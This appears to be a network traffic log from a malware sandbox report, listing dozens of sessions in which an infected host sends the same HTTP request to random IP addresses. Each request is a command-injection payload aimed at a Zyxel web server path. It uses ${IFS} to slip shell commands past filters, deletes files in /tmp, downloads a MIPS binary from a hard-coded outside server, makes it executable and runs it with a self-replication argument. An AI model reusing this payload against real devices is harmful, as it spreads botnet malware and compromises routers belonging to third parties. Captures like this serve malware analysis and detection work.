                                        Jan 14, 2024 16:18:47.520520926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5039192.168.2.133424489.205.74.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520561934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5040192.168.2.1352490155.194.14.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520606995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5041192.168.2.135216866.47.251.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520638943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5042192.168.2.134282693.246.47.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520690918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5043192.168.2.1350102169.169.221.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520733118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5044192.168.2.135433278.240.197.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520754099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5045192.168.2.1345704174.7.44.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520791054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5046192.168.2.1344220172.165.59.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520842075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5047192.168.2.135962677.84.135.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520855904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5048192.168.2.1340156125.127.131.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520961046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5049192.168.2.1346232116.43.222.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521018982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5050192.168.2.1352940206.75.27.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521054029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5051192.168.2.133380242.105.104.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521096945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5052192.168.2.1344508114.48.230.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521122932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5053192.168.2.135006450.245.252.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521181107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5054192.168.2.1334796134.68.37.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521224976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5055192.168.2.1342320171.253.73.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521261930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5056192.168.2.135738032.161.71.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521291018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5057192.168.2.133489461.42.25.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521334887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5058192.168.2.1343738161.56.161.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521374941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5059192.168.2.134382060.192.86.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521430016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5060192.168.2.135993890.60.226.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521462917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5061192.168.2.133858859.217.235.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521485090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5062192.168.2.1357788141.172.165.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521531105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5063192.168.2.134017452.16.160.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521574020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5064192.168.2.13467642.194.154.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521610022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5065192.168.2.1345244200.104.91.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521655083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5066192.168.2.1352474104.57.33.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521680117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5067192.168.2.1341400152.198.162.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521739960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5068192.168.2.134690265.80.153.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521766901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5069192.168.2.133946644.156.5.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521800041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5070192.168.2.1354008200.253.135.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521858931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5071192.168.2.1352734220.189.233.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521882057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5072192.168.2.1357048186.230.188.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521929026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5073192.168.2.1332864131.101.169.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.521960020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5074192.168.2.1339984128.237.111.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522018909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5075192.168.2.133853291.82.43.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522041082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5076192.168.2.133716620.173.33.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522094965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5077192.168.2.134618888.217.251.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522138119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5078192.168.2.134425813.90.81.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522167921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5079192.168.2.1351588170.40.70.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522191048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5080192.168.2.1345470139.230.223.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522233009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5081192.168.2.136040883.131.58.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522248030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5082192.168.2.1344308109.148.75.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522324085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5083192.168.2.136036095.118.139.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522358894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5084192.168.2.134861887.87.187.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522397995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5085192.168.2.135815840.176.5.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522445917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5086192.168.2.1339218167.58.17.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522460938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5087192.168.2.13376009.214.58.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522505999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5088192.168.2.1346646195.64.124.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522547960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5089192.168.2.135056491.204.59.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522588968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5090192.168.2.133775249.88.214.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522648096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5091192.168.2.134736265.64.164.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522684097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5092192.168.2.135410848.158.105.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522727966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5093192.168.2.133361651.29.67.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522789001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5094192.168.2.1354852196.217.3.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.522824049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5095192.168.2.1336126170.206.169.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527061939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5096192.168.2.1336630167.52.199.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527097940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5097192.168.2.1345184129.132.238.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527132988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5098192.168.2.1333240155.71.28.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527184963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5099192.168.2.1343190176.7.188.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527236938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5100192.168.2.135924646.89.9.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527282000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5101192.168.2.134907019.187.102.211443
                                        TimestampBytes transferredDirectionData
